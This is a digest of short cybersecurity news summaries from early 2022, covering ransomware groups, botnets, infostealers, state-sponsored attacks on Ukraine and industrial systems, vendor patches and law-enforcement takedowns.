    After breaching servers managed by the cybercriminals, security researchers found a connection between Conti ransomware and the recently emerged Karakurt data extortion group, showing that the two gangs are part of the same operation. The Conti ransomware syndicate is one of the most prolific cybercriminal groups today that operates unabated despite the massive leak of internal conversations and source code that a hacking group already used to cripple Russian organizations.

    Google Issues Third Emergency Fix for Chrome This Year

    Google is issuing fixes for two vulnerabilities in its Chrome web browser, including one flaw already being exploited in the wild. The emergency updates the company issued this week impacted almost 3 billion users of its Chrome browser and those using other Chromium-based browsers, such as Microsoft Edge, Brave, and Vivaldi.

    New Fodcha DDoS Botnet Targets Over 100 Victims Every Day

    A rapidly growing botnet is ensnaring routers, DVRs, and servers across the Internet to target more than 100 victims every day in distributed denial-of-service (DDoS) attacks. This newly discovered malware, named Fodcha by researchers at Qihoo 360's Network Security Research Lab (360 Netlab), has spread to over 62,000 devices between March 29 and April 10.

    OldGremlin Ransomware Gang Targets Russia With New Malware

    OldGremlin, a little-known threat actor that uses its particularly advanced skills to run carefully prepared, sporadic campaigns, has made a comeback last month after a gap of more than one year. The group distinguishes itself from other ransomware operations through the small number of campaigns - less than five since early 2021 - that target only businesses in Russia and the use of custom backdoors built in-house.

    Hackers Target Ukrainian Govt With IcedID malware, Zimbra Exploits

    Hackers are targeting Ukrainian government agencies with new attacks exploiting Zimbra exploits and phishing attacks pushing the IcedID malware. The Computer Emergency Response Team of Ukraine (CERT-UA) detected the new campaigns and attributed the IcedID phishing attack to the UAC-0041 threat cluster, previously connected with AgentTesla distribution, and the second to UAC-0097, a currently unknown actor.

    "Haskers Gang" Introduces New ZingoStealer

    A new type of information stealer has been added to the Haskers Gang malware portfolio. On Thursday, researchers from Cisco Talos said that the malware, dubbed ZingoStealer, is being offered for free to Haskers Gang Telegram group members. Active since at least 2020, the Haskers Gang group isn't your typical, small collective of cybercriminals. Instead, the 'community' comprises of a few founders -- likely based in Eastern Europe -- and thousands of casual members.

    New State-Sponsored Cyber Attack Tools Target Multiple Industrial Control Systems

    n early 2022, Mandiant, in partnership with Schneider Electric, analyzed a set of novel industrial control system (ICS)-oriented attack tools—which we call INCONTROLLER—built to target machine automation devices. The tools can interact with specific industrial equipment embedded in different types of machinery leveraged across multiple industries. While the targeting of any operational environments using this toolset is unclear, the malware poses a critical risk to organizations leveraging the targeted equipment. INCONTROLLER is very likely state sponsored and contains capabilities related to disruption, sabotage, and potentially physical destruction.

    Remote Procedure Call Runtime Remote Code Execution Vulnerability

    Microsoft Patch Tuesday security updates for April 2022 fixed 128 vulnerabilities in multiple products, including Microsoft Windows and Windows Components, Microsoft Defender and Defender for Endpoint, Microsoft Dynamics, Microsoft Edge (Chromium-based), Exchange Server, Office and Office Components, SharePoint Server, Windows Hyper-V, DNS Server, Skype for Business, .NET and Visual Studio, Windows App Store, and Windows Print Spooler Components.

    Critical Vulnerabilities Uncovered in Hospital Robots

    Vendor Aethon has patched five critical vulnerabilities in hospital robots used to deliver medical supplies. Aethon's mobile robots (referred to as TUG) are autonomous devices used by hundreds of hospitals to perform basic, repetitive tasks to augment existing workforces. TUGs run errands including medicine delivery, cleaning, and dropping off linen and other supplies to healthcare professionals. Stanford is a healthcare provider that uses the robots in drug deliveries, which can move at 2mph down pre-determined routes.

    Critical Flaw in Elementor WordPress Plugin May Affect 500K Sites

    The authors of the Elementor Website Builder plugin for WordPress have just released version 3.6.3 to address a critical remote code execution flaw that may impact as many as 500,000 websites. Although exploiting the flaw requires authentication, it's critical severity is given by the fact that anyone logged into the vulnerable website can exploit it, including regular subscribers.

    Microsoft Disrupts ZLoader Malware in Global Operation

    A months-long global operation led by Microsoft's Digital Crimes Unit (DCU) has taken down dozens of domains used as command-and-control (C2) servers by the notorious ZLoader botnet. The court order obtained by Microsoft allowed it to sinkhole 65 hardcoded domains used by the ZLoader cybercrime gang to control the botnet and another 319 domains registered using the domain generation algorithm used to create fallback and backup communication channels.

    Enemybot: A New Mirai, Gafgyt Hybrid Botnet Joins the Scene

    A new botnet is targeting routers, Internet of Things (IoT) devices, and an array of server architectures. On April 12, cybersecurity researchers from FortiGuard Labs said the new distributed denial-of-service (DDoS) botnet, dubbed Enemybot, borrows modules from the infamous Mirai botnet's source code, alongside Gafgyt's

    Sandworm Hackers Fail to Take Down Ukrainian Energy Provider

    The Russian state-sponsored hacking group known as Sandworm tried on Friday to take down a large Ukrainian energy provider by disconnecting its electrical substations with a new variant of the Industroyer malware for industrial control systems (ICS) and a new version of the CaddyWiper data destruction malware.

    LockBit Ransomware Gang Lurked in a U.S. Gov Network for Months

    A regional U.S. government agency compromised with LockBit ransomware had the threat actor in its network for at least five months before the payload was deployed, security researchers found. Logs retrieved from the compromised machines showed that two threat groups had compromised them and were engaged in reconnaissance and remote access operations.

    United States Leads Seizure of One of the World’s Largest Hacker Forums and Arrests Administrator

    "The Department of Justice today announced the seizure of the RaidForums website, a popular marketplace for cybercriminals to buy and sell hacked data, and unsealed criminal charges against RaidForums’ founder and chief administrator, Diogo Santos Coelho, 21, of Portugal. Coelho was arrested in the United Kingdom on Jan. 31, at the United States’ request and remains in custody pending the resolution of his extradition proceedings.

    Only Half of Organizations Reviewed Security Policies Due to the Pandemic: Study

    According to research published on Tuesday by the Ponemon Institute, on behalf of Intel, the global enterprise will spend roughly $172 billion on cybersecurity this year. However, only 53% of respondents said they refreshed their existing strategies due to the pandemic -- and this could indicate a disconnect between spending the cash and applying it correctly to the modern workplace,

    Conti’s Leaked Ransomware Used to Target Russian Businesses

    A hacker organization known as NB65 has been infiltrating Russian businesses, collecting their data, and then exposing it online, stating that the attacks are being carried out in retaliation for Russia's military intervention in Ukraine. The hacker gang claims to have targeted several Russian businesses, including document management company Tensor, the Russian space agency Roscosmos, and the state-owned Russian television and radio station VGTRK

    New Android Banking Malware Remotely Takes Control of Your Device

    A new Android banking malware named Octo has appeared in the wild, featuring remote access capabilities that allow malicious operators to perform on-device fraud. Octo is an evolved Android malware based on ExoCompact, a malware variant based on the Exo trojan that quit the cybercrime space and had its source code leaked in 2018.

    New Meta Information Stealer Distributed in Malspam Campaign

    A malspam campaign has been found distributing the new META malware, a new info-stealer malware that appears to be rising in popularity among cybercriminals. META is one of the novel info-stealers, along with Mars Stealer and BlackGuard, whose operators wish to take advantage of Raccoon Stealer's exit from the market that left many searching for their next platform.

    Snap-on Discloses Data Breach Claimed by Conti Ransomware Gang

    American automotive tools manufacturer Snap-on announced a data breach exposing associate and franchisee data after the Conti ransomware gang began leaking the company's data in March. Snap-on is a leading manufacturer and designer of tools, software, and diagnostic services used by the transportation industry through various brands, including Mitchell1, Norbar, Blue-Point, Blackhawk, and Williams.

    OpenSSH Now Defaults to Protecting Against Quantum Computer Attacks

    Post-quantum cryptography has arrived by default with the release of OpenSSH 9 and the adoption of the hybrid Streamlined NTRU Prime + x25519 key exchange method. "The NTRU algorithm is believed to resist attacks enabled by future quantum computers and is paired with the X25519 ECDH key exchange (the previous default) as a backstop against any weaknesses in NTRU Prime that may be discovered in the future. The combination ensures that the hybrid exchange offers at least as good security as the status quo," the release notes said

    Microsoft Takes Down APT 28 Domains Used in Attacks Against Ukraine

    Microsoft has successfully disrupted attacks against Ukrainian targets coordinated by the Russian APT28 hacking group after taking down seven domains used as attack infrastructure. Strontium (also tracked as Fancy Bear or APT28), linked to Russia's military intelligence service GRU, used these domains to target multiple Ukrainian institutions, including media organizations.

    Malicious Web Redirect Service Infects 16,500 Sites to Push Malware

    A new traffic direction system (TDS) called Parrot is relying on servers that host 16,500 websites of universities, local governments, adult content platforms, and personal blogs. Parrot's use is for malicious campaigns to redirect potential victims matching a specific profile (location, language, operating system, browser) to online resources such as phishing and malware-dropping sites.

    Finland Government Sites Forced Offline by DDoS Attacks

    The websites of Finland’s defense and foreign affairs were taken offline today following DDoS attacks. The ministries each confirmed the attacks on Twitter earlier today, although the websites now appear to be back up and running. The nation’s Ministry of Defense wrote at 10.45 am GMT: “The Department of Defense’s website is currently under attack. We are currently investigating. We will post any additional information below.” It followed up with: “For the time being, we will keep the Department of Defense website closed until the harmful traffic on the website is gone”

    FIN7 Hacking Group Member Sentenced to Five Years Behind Bars

    A Ukrainian national has been sentenced as a member of the FIN7 hacking group. Becoming a certified ethical hacker can lead to a rewarding career. Here are our recommendations for the top certifications. On Thursday, the US Department of Justice (DoJ) announced the sentencing of Denys Iarmak to five years in prison for working as a FIN7 penetration tester.

    Employee Info Among 13 Million Records Leaked by Fox News

    A configuration error exposed millions of internal records traced back to Fox News, including personally identifiable information on employees, researchers have claimed. A team at Website Planet led by Jeremiah Fowler claimed that anyone with an internet connection could theoretically have discovered the 58GB trove, which was left open with no password protection.

    VMware Releases Critical Patches for New Vulnerabilities Affecting Multiple Products

    VMware has released security updates to patch eight vulnerabilities spanning its products, some of which could be exploited to launch remote code execution attacks. Tracked from CVE-2022-22954 to CVE-2022-22961 (CVSS scores: 5.3 - 9.8), the issues impact VMware Workspace ONE Access, VMware Identity Manager, VMware vRealize Automation, VMware Cloud Foundation, and vRealize Suite Lifecycle Manager. Five of the eight bugs are rated Critical, two are rated Important, and one is rated Moderate in severity. Credited with reporting all the vulnerabilities is Steven Seeley of Qihoo 360 Vulnerability Research Institute.

    New FFDroider Malware Steals Facebook, Instagram, Twitter Accounts

    A new information stealer named FFDroider has emerged, stealing credentials and cookies stored in browsers to hijack victims' social media accounts. Social Media accounts, especially verified ones, are an attractive target for hackers as threat actors can use them for various malicious activities, including conducting cryptocurrency scams and distributing malware. These accounts are even more attractive when they have access to the social site's ad platforms, allowing threat actors to use the stolen credentials to run malicious advertisements.

    CVE-2022-0778 Impact of the OpenSSL Infinite Loop Vulnerability CVE-2022-0778

    The Palo Alto Networks Product Security Assurance team is evaluating the OpenSSL infinite loop vulnerability (CVE-2022-0778) as it relates to our products. This vulnerability causes the OpenSSL library to enter an infinite loop when parsing an invalid certificate and can result in a Denial-of-Service (DoS) to the application. An attacker does not need a verified certificate to exploit this vulnerability because parsing a bad certificate triggers the infinite loop before the verification process is completed.

    Attackers Create Malware for Serverless Computing Platforms Like AWS Lambda

    Security researchers have spotted a new cryptocurrency miner targeting serverless computing platforms, like AWS Lambda. While the malware only runs cryptomining software, it shows how threat actors are capable of exploiting complex cloud infrastructure. While cryptomining is more of a nuisance than anything, there are implications for more prolific attacks in the future.

    Attack on Ukraine Telecoms Provider Caused by Compromised Employee Credentials

    Russian hackers used compromised employee credentials to launch the cyber-attack that severely disrupted internet services in Ukraine last week, it has been claimed today. Kyrylo Honcharuk, CIO of Ukrtelecom, Ukraine’s national telecommunications provider targeted in the attack on March 28, said Russia accessed the account of an employee in a region “recently temporarily” occupied, although the exact location was not disclosed.

    US Disrupts Russian Cyclops Blink Botnet Before Being Used in Attacks

    US government officials announced today the disruption of the Cyclops Blink botnet controlled by the Russian-backed Sandworm hacking group before being used in attacks. The malware, used by Sandworm to create this botnet since at least June 2019, is targeting WatchGuard Firebox firewall appliances and multiple ASUS router models. Cyclops Blink enables the attackers to establish persistence on the device through firmware updates, providing remote access to compromised networks.

    Ransomware: Conti Gang Is Still in Business, Despite Its Own Massive Data Leak

    The Conti ransomware gang is still actively running campaigns against victims around the world, despite the inner workings of the group being revealed by data leaks. One of the most prolific ransomware groups of the last year, Conti has encrypted networks of hospitals, businesses, government agencies and more – in many cases, receiving a significant ransom payment in exchange for the decryption key.

    Block Warns Eight Million Customers of Insider Breach

    A leading US payments company is contacting over eight million current and former customers of its Cash App Investing subsidiary that their details may have been accessed by a malicious insider. San Francisco-headquartered Block revealed the news in an SEC filing on Monday.

    CISA Advises D-Link Users to Take Vulnerable Routers Offline

    CVE-2021-45382 is a Remote Code Execution (RCE) vulnerability that exists in all series H/W revisions D-Link DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, and DIR-836L routers via the DDNS function in ncc2 binary file. DDNS (Dynamic Domain Name System) is a function that allows systems to overcome the issues related to Dynamic IP Addresses, in attempting to connect to a resource somewhere on the Internet whose IP address may change at any time.

    WhatsApp 'Voice Message' Is an Info-Stealing Phishing Attack

    Tens of thousands of victims have been tricked into clicking on an email claiming to contain a WhatsApp voicemail message, according to researchers. A team at Armorblox has already detected close to 28,000 mailboxes impacted across Google Workspace and Microsoft 365. The email in question is titled “New Incoming Voicemessage,” with the body text spoofed to appear as if a private message has been sent via WhatsApp to the recipient. To view the secure message, victims are asked to click on an embedded button called “play.” Upon clicking on the button, the email will redirect the victim to a webpage that attempts to install the JS/Kryptik Trojan.

    Researchers Trace Widespread Espionage Attacks Back to Chinese 'Cicada' Hackers

    A Chinese state-backed advanced persistent threat (APT) group known for singling out Japanese entities has been attributed to a new long-running espionage campaign targeting new geographies, suggesting a "widening" of the threat actor's targeting. The widespread intrusions, which are believed to have commenced at the earliest in mid-2021 and continued as recently as February 2022, have been tied to a group tracked as Cicada, which is also known as APT10, Stone Panda, Potassium, Bronze Riverside, or MenuPass Team.

    Ukraine Spots Russian-linked 'Armageddon' Phishing Attacks

    The Computer Emergency Response Team of Ukraine (CERT-UA) has spotted new phishing attempts attributed to the Russian threat group tracked as Armageddon (Gamaredon). The malicious emails attempt to trick the recipients with lures themed after the war in Ukraine and infect the target systems with espionage-focused malware.

    These Ten Hacking Groups Have Been Targeting Critical Infrastructure and Energy

    Electricity, oil and gas and other critical infrastructure vital to our everyday lives is increasingly at risk from cyber attackers who know that successfully compromising industrial control systems (ICS) and operational technology (OT) can enable them to disrupt or tamper with vital services. A report from cybersecurity company Dragos details ten different hacking operations which are known to have actively targeted industrial systems in North America and Europe – and it's warned that this activity is likely to grow in the next 12 months.

    New Borat Remote Access Malware Is No Laughing Matter

    A new remote access trojan (RAT) named Borat has appeared on darknet markets, offering easy-to-use features to conduct DDoS attacks, UAC bypass, and ransomware deployment. As a RAT, Borat enables remote threat actors to take complete control of their victim’s mouse and keyboard, access files, network points, and hide any signs of their presence. The malware lets its operators choose their compilation options to create small payloads that feature precisely what they need for highly tailored attacks.

    Hackers breach MailChimp's Internal Tools to Target Crypto Customers

    Email marketing firm MailChimp disclosed on Sunday that they had been hit by hackers who gained access to internal customer support and account management tools to steal audience data and conduct phishing attacks. Sunday morning, Twitter was abuzz with reports from owners of Trezor hardware cryptocurrency wallets who received phishing notifications claiming that the company suffered a data breach. These emails prompted Trezort customers to reset their hardware wallet PINs by downloading malicious software that allowed stealing the stored cryptocurrency.

    NSA Employee Accused of Sharing National Defense Secrets

    An employee of the United States National Security Agency (NSA) has been accused of sending national defense secrets from his personal email account. A 26-count indictment unsealed Thursday in the District of Maryland alleges that 60-year-old Mark Robert Unkenholz willfully transmitted classified National Defense Information (NDI) on 13 occasions between February 14 2018 and June 1 2020.

    FIN7 Hackers Evolve Toolset, Work with Multiple Ransomware Gangs

    Threat analysts have compiled a detailed technical report on FIN7 operations from late 2021 to early 2022, showing that the adversary continues to be very active, evolving, and trying new monetization methods. FIN7 (a.k.a. Carbanak) is a Russian-speaking, financially motivated actor known for its resourceful and diverse set of tactics, custom-made malware, and stealthy backdoors. Although some members of the group were indicted in 2018, followed by the sentencing of one of its managers in 2021, FIN7 did not disappear and kept developing new tools for stealthy attacks.

    Experts Discovered 15-Year-Old Vulnerabilities in the PEAR PHP Repository

    Researchers from SonarSource discovered two 15-year-old security flaws in the PEAR (PHP Extension and Application Repository) repository that could have enabled supply chain attacks. PEAR is a framework and distribution system for reusable PHP components” (Security Affairs, 2022). The vulnerability has been deemed critical because it can easily be exploited by a low-skilled threat actor, it also resides in a central component of the PHP supply chain. Using the vulnerability, and attacker can take over any developer account and even publish malicious releases.

    3CX Phone Management System

    Security Researcher "frycos" has released an alleged vulnerability impacting the 3CX Phone Management System. "3CX is an open-platform office phone system that runs on premise on Windows or Linux, with the option to migrate to cloud with a simple backup and restore." (3CX). The software is typically installed on-premise and is a VoIP solution for collaborative communication.

    Zyxel Patches Critical Bug Affecting Firewall and VPN Devices

    Network equipment company Zyxel has updated the firmware of several of its business-grade firewall and VPN products to address a critical-severity vulnerability that could give attackers administrator-level access to affected devices. Zyxel’s security advisory refers to products from the USG/ZyWALL, USG FLEX, ATP, VPN, and NSG (Nebula Security Gateway) series. Tracked as CVE-2022-0342, the vulnerability if exploited allows an unauthenticated attacker to gain administrative access to impacted Zyxel devices.

    Critical Bugs in Rockwell PLC Could Allow Hackers to Implant Malicious Code

    Two new security vulnerabilities have been disclosed in Rockwell Automation's programmable logic controllers (PLCs) and engineering workstation software that could be exploited by an attacker to inject malicious code on affected systems and stealthily modify automation processes. The flaws have the potential to disrupt industrial operations and cause physical damage to factories in a manner similar to that of Stuxnet and the Rogue7 attacks, operational technology security company Claroty said.

    Apple Rushes Out Patches for 0-Days in MacOS, iOS

    Apple rushed out patches for two zero-days affecting macOS and iOS Thursday, both of which are likely under active exploitation and could allow a threat actor to disrupt or access kernel activity. Apple released separate security updates for the bugs – a vulnerability affecting both macOS and iOS tracked as CVE-2022-22675 and a macOS flaw tracked as CVE-2022-22674. Their discovery was attributed to an anonymous researcher. CVE-2022-22675 – found in the AppleAVD component present in both macOS and iOS – could allow an application to execute arbitrary code with kernel privileges, according to the advisory.

    AcidRain, A Wiper That Crippled Routers and Modems in Europe

    Security researchers at SentinelLabs have spotted a previously undetected destructive wiper tracked as AcidRain, that hit routers and modems and was suspected to be linked to the Viasat KA-SAT attack that took place on February 24th, 2022. The cyberattack hit the KA-SAT network which caused thousands of modems across Europe to be unreachable. AcidRain uses destructive commands to overwrite key data in flash memory. The modems were then unable to access the network, but were not permanently damaged.

    Meet BlackGuard: A New Infostealer Peddled on Russian Hacker Forums

    Researchers have uncovered a new infostealer malware being peddled in Russian underground forums. Dubbed BlackGuard, zScaler says that the new malware strain is "sophisticated" and has been made available to criminal buyers for a monthly price of $200. Infostealers are forms of malware designed to harvest valuable data, potentially including operating system information, contact lists, screenshots, network traffic, and online account credentials including those used to access financial services and banking.

    New Python-based Ransomware Targeting JupyterLab Web Notebooks

    Researchers have disclosed what they say is the first-ever Python-based ransomware strain specifically designed to target exposed Jupyter notebooks, a web-based interactive computing platform that allows editing and running programs via a browser. While access to the online application is normally restricted, sometimes these notebooks are left exposed to the internet with no authentication means, allowing anyone to easily access the notebook.

    NATO Countries Targeted in Russian Phishing Attacks, Google Reports

    According to the Google Threat Analysis Group (TAG), a great number of threat actors are currently exploiting the event of the Russian invasion in Ukraine to launch phishing and malware cyberattacks against Eastern European and NATO countries. The cyberattacks also target Ukraine. Credential phishing cyberattacks organized by a Russian-based hacking group known as COLDRIVER against a NATO Center of Excellence and Eastern European forces are highlighted in the paper. “A Ukrainian defense contractor and many US-based non-governmental organizations (NGOs) together with think tanks were also among the targets of Russian threat actors.

    Mysterious Disclosure of a Zero-day RCE Flaw Spring4Shell in Spring

    Researchers disclosed a zero-day vulnerability, dubbed Spring4Shell, in the Spring Core Java framework called ‘Spring4Shell.’ An unauthenticated, remote attacker could trigger the vulnerability to execute arbitrary code on the target system. The framework is currently maintained by Spring.io which is a subsidiary of VMware. The Spring Framework is an application framework and inversion of control container for the Java platform. The framework’s core features can be used by any Java application, but there are extensions for building web applications on top of the Java EE (Enterprise Edition) platform.

    CISA and the DOE Release: Mitigating Attacks Against Uninterruptible Power Supply Devices

    According to .PDF released by the the Cybersecurity and Infrastructure Security Agency (CISA) and the Department of Energy are aware of threat actors gaining access to a variety of internet-connected uninterruptible power supply (UPS) devices, often through unchanged default usernames and passwords. In recent years, UPS vendors have added an Internet of Things capability, and UPSs are routinely attached to networks for power monitoring, routine maintenance, and/or convenience.

    Researchers Expose Mars Stealer Malware Campaign Using Google Ads to Spread

    A nascent information stealer called Mars has been observed in campaigns that take advantage of cracked versions of the malware to steal information stored in web browsers and cryptocurrency wallets. "Mars Stealer is being distributed via social engineering techniques, malspam campaigns, malicious software cracks, and keygens," Morphisec malware researcher Arnold Osipov said in a report published Tuesday.

    Phishing Campaign Targets Russian Govt Dissidents With Cobalt Strike

    A new spear phishing campaign is taking place in Russia targeting dissenters with opposing views to those promoted by the state and national media about the war against Ukraine. The campaign targets government employees and public servants with emails warning of the software tools and online platforms that are forbidden in the country. The messages come with a malicious attachment or link embedded in the body that is dropping a Cobalt Strike beacon to the recipient's system, enabling remote operators to conduct espionage on the target.

    Viasat Shares Details on KA-SAT Satellite Service Cyberattack

    US satellite communications provider Viasat has shared an incident report regarding the cyberattack that affected its KA-SAT consumer-oriented satellite broadband service on February 24, the day Russia invaded Ukraine. Today's incident report comes after the KA-SAT satellite network — "used intensively by the Ukrainian military" — was affected by a cyberattack that triggered satellite service outages in Central and Eastern Europe.

    Personal Data of 620 FSB Officers Published Online

    The Ukrainian Defense Ministry’s Directorate of Intelligence has published what it claims is the personal data of hundreds of Russian intelligence officers online. The data, which was published on Monday, contains the names, addresses and phone numbers of 620 individuals who Ukraine asserts to be officers of Russia’s Federal Security Service (FSB) involved in “criminal activities” in Europe. Ukraine said the alleged FSB officers on the list are registered as living in Lubyanka – the agency’s headquarters in Moscow.

    CISA and DOE Publish Cybersecurity Guidance To Protect UPS Devices

    The Cybersecurity and Infrastructure Security Agency (CISA) and the Department of Energy (DOE) are aware of threat actors gaining access to a variety of internet-connected uninterruptible power supply (UPS) devices, often through unchanged default usernames and passwords. In a CISA and DOE Insights, organizations are provided with recommended actions to mitigate attacks against UPS devices.

    Ukraine Destroys Five Bot Farms That Were Spreading 'Panic' Among Citizens

    The Security Service of Ukraine (SBU) has destroyed five "enemy" bot farms engaged in activities to frighten Ukrainian citizens. In a March 28 release, the SBU said that the bot farms had an overall capacity of at least 100,000 accounts spreading misinformation and fake news surrounding Russia's invasion of Ukraine, which started on February 24 and has now lasted over a month.

    Hacked WordPress Sites Force Visitors to DDoS Ukrainian Targets

    Hackers are compromising WordPress sites to insert a malicious script that uses visitors' browsers to perform distributed denial-of-service attacks on Ukrainian websites. Today, MalwareHunterTeam discovered a WordPress site compromised to use this script, targeting ten websites with Distributed Denial of Service (DDoS) attacks. These websites include Ukrainian government agencies, think tanks, recruitment sites for the International Legion of Defense of Ukraine, financial sites, and other pro-Ukrainian sites.

    Critical SonicWall Firewall Patch Not Released for All Devices

    Security hardware manufacturer SonicWall has fixed a critical vulnerability in the SonicOS security operating system that allows denial of service (DoS) attacks and could lead to remote code execution (RCE). The security flaw is a stack-based buffer overflow weakness with a 9.4 CVSS severity score and impacting multiple SonicWall firewalls.

    Microsoft Exchange Targeted For IcedID Reply-chain hijacking Attacks

    The distribution of the IcedID malware has seen a spike recently due to a new campaign that hijacks existing email conversation threads and injects malicious payloads that are hard to spot. IcedID is a modular banking trojan first spotted back in 2017, used mainly to deploy second-stage malware such as other loaders or ransomware. Its operators are believed to be initial access brokers who compromise networks and then sell the access to other cybercriminals.

    Emergency Google Chrome Update Fixes Zero-day Used in Attacks

    Google has released Chrome 99.0.4844.84 for Windows, Mac, and Linux users to address a high-severity zero-day bug exploited in the wild. "Google is aware that an exploit for CVE-2022-1096 exists in the wild," the browser vendor said in a security advisory published on Friday. The 99.0.4844.84 version is already rolling out worldwide in the Stable Desktop channel, and Google says it might be a matter of weeks until it reaches the entire userbase.

    Sophos Patches Critical Remote Code Execution Vulnerability in Firewall

    Sophos has patched a remote code execution (RCE) vulnerability in the Firewall product line. Sophos Firewall is an enterprise cybersecurity solution that can adapt to different networks and environments. Firewall includes TLS and encrypted network traffic inspection, deep packet inspection, sandboxing, intrusion prevention systems (IPSs), and visibility features for detecting suspicious and malicious network activity. On March 25, the cybersecurity company disclosed the RCE, which was privately disclosed to Sophos via the firm's bug bounty program by an external cybersecurity researcher.

    Hive Ransomware Ports its Linux VMware ESXi Encryptor to Rust

    The Hive ransomware operation has converted their VMware ESXi Linux encryptor to the Rust programming language and added new features to make it harder for security researchers to snoop on victim's ransom negotiations. As the enterprise becomes increasingly reliant on virtual machines to save computer resources, consolidate servers, and for easier backups, ransomware gangs are creating dedicated encryptors that focus on these services. Ransomware gang's Linux encryptors typically target the VMware ESXI virtualization platforms as they are the most commonly used in the enterprise.

    Russia Facing Internet Outages Due to Equipment Shortage and Loss of IT Talent

    Russia's RSPP Commission for Communications and IT, the country's largest entrepreneurship union, has warned of imminent large-scale service Internet service outages due to the lack of available telecom equipment. To raise awareness, the commission has compiled a document that reflects the practical challenges facing the industry in Russia at this time and also presents a set of proposals specifically crafted to alleviate them. Russian media that have seen the document in question say that the warning is dire, as the commission highlights the reserves of telecom operator equipment will only last for another six months.

    UK Police Arrested 7 Alleged Members of Lapsus$ Extortion Gang

    The City of London Police announced to have arrested seven teenagers suspected of being members of the notorious Lapsus$ extortion gang, which is believed to be based in South America. “Four researchers investigating the hacking group Lapsus$, on behalf of companies that were attacked, said they believe the teenager is the mastermind.” states Bloomberg that first reported the news. “Lapsus$ has befuddled cybersecurity experts as it has embarked on a rampage of high-profile hacks.

    U.S. Charges 4 Russian Govt. Employees Over Hacking Critical Infrastructure Worldwide

    The U.S. government on Thursday released a cybersecurity advisory outlining multiple intrusion campaigns conducted by state-sponsored Russian cyber actors from 2011 to 2018 that targeted the energy sector in the U.S. and beyond. "The [Federal Security Service] conducted a multi-stage campaign in which they gained remote access to U.S. and international Energy Sector networks, deployed ICS-focused malware, and collected and exfiltrated enterprise and ICS-related data," the U.S. government said, attributing the attacks to an APT actor known as Energetic Bear.

    Western Digital My Cloud OS Update Fixes Critical Vulnerability

    Western Digital has released new My Cloud OS firmware to fix a vulnerability exploited by bug hunters during the Pwn2Own 2021 hacking competition to achieve remote code execution. The flaw, tracked as CVE-2022-23121, was exploited by the NCC Group’s EDG team members and relied on the open-source service named “Netatalk Service” that was included in My Cloud OS. The vulnerability, which has a CVSS v3 severity score of 9.8, allows remote attackers to execute arbitrary code on the target device, in this case, WD PR4100 NAS, without requiring authentication.

    Honda Bug Lets a Hacker Unlock and Start Your Car via Replay Attack

    Researchers have disclosed a 'replay attack' vulnerability affecting select Honda and Acura car models, that allows a nearby hacker to unlock your car and even start its engine from a short distance. The attack consists of a threat actor capturing the RF signals sent from your key fob to the car and resending these signals to take control of your car's remote keyless entry system. The vulnerability, according to researchers, remains largely unfixed in older models. But Honda owners may be able to take some action to protect themselves against this attack.

    VMware Issues Patches for Critical Flaws Affecting Carbon Black App Control

    On Wednesday, the cloud computing company VMware released software updates to patch two critical security vulnerabilities affecting its Carbon Black App Control platform. The vulnerabilities, if exploited, could be abused by threat actors to execute arbitrary code on affected installations in Windows systems. VMware Carbon Black App Control is an application allow listing solution that is designed to enable security operations teams to lock down servers and critical systems, prevent unwanted changes, and ensure continuous compliance with regulatory mandates.

    North Korean Hackers Exploit Chrome zero-day Weeks Before Patch

    North Korean state hackers have exploited a zero-day, remote code execution vulnerability in Google Chrome web browser for more than a month before a patch became available, in attacks targeting news media, IT companies, cryptocurrency, and fintech organizations. Google’s Threat Analysis Group (TAG) attributed two campaigns exploiting the recently patched CVE-2022-0609 (described only as “use after free in Animation” at the moment) to two separate attacker groups backed by the North Korean government.

    Malicious NPM Packages Target Azure Developers to Steal Personal Data

    A "large scale" attack is targeting Microsoft Azure developers through malicious npm packages. On Wednesday, cybersecurity researchers from JFrog said that hundreds of malicious packages have been identified, created to steal valuable personally identifiable information (PII) from developers. The miscreants responsible for the npm repositories have developed an automated script that targets the @azure npm scope, alongside @azure-rest, @azure-tests, @azure-tools, and @cadl-lang.

    Ukrainian Enterprises Hit with the DoubleZero Wiper

    Ukraine CERT-UA continues to observe malware based attacks aimed at Ukrainian organizations, in a recent alert it warned of attacks employing a wiper dubbed DoubleZero. The campaign was first spotted by CERT-UA on March 17, after seeing threat actors targeting users with malicious spear-phishing attacks. DoubleZero is an obfuscated .Net program that can be used to destroy files on infected systems.

    Anonymous Hacked Nestlè and Leaked 10 GB of Sensitive Data

    Yesterday, the popular Anonymous hacktivist collective announced on twitter that it hacked Nestle, the largest food company in the world. Anonymous recently declared war on all companies that continue to operate in Russia by paying taxes to the Russian government. On March 20, the group stated that it would give the companies 48 hours to withdraw from Russia. Any company that failed to comply would become a target of the hacktivist group.

    Hackers Exploit New WPS Office Flaw to Breach Betting Firms

    An unknown Chinese-speaking threat actor has been targeting betting companies in Taiwan, Hong Kong, and the Philippines, leveraging a vulnerability in WPS Office to plant a backdoor on the targeted systems. The adversary appears to be sophisticated, and its toolset features code similarities to APT group backdoors analyzed in two 2015 and 2017 reports by Palo Alto and BlackBerry, respectively The newest campaign was spotted by researchers at Avast, who have sampled several malware tools from the threat actors, who have compiled a rich, modular toolset.

    Custom macOS Malware of Chinese Hackers ‘Storm Cloud’ Exposed

    Researchers have discovered a previously unknown macOS malware variant called GIMMICK, which is believed to be a custom tool used by a Chinese espionage threat actor known as 'Storm Cloud.’ The malware was discovered by researchers at Volexity, who retrieved it from the RAM of a MacBook Pro running macOS 11.6 (Big Sur), which was compromised in a late 2021 cyberespionage campaign. GIMMICK is a multi-platform family that uses public cloud hosting services such as Google Drive for command-and-control (C2) channels. The malware is written primarily in Objective C, with Windows versions written in both .NET and Delphi. Despite the differences in programming languages used, Volexity has tracked the malware under the same name due to the shared C2 architecture, file paths, and behavioral patterns used by all variants.

    Lapsus$ Gang Compromised a Microsoft Employee’s Account

    Microsoft confirmed that Lapsus$ extortion group has hacked one of its employees to access and steal the source code of some projects. Yesterday the cybercrime gang leaked 37GB of source code stolen from Microsoft’s Azure DevOps server. On Sunday, the Lapsus$ gang announced to have compromised Microsoft’s Azure DevOps server and shared a screenshot of alleged internal source code repositories. The gang claims to have leaked the source code for some Microsoft projects, including Bing and Cortana.

    Android App With 100,000 Downloads Contained Password-stealing Malware, Say Security Researchers

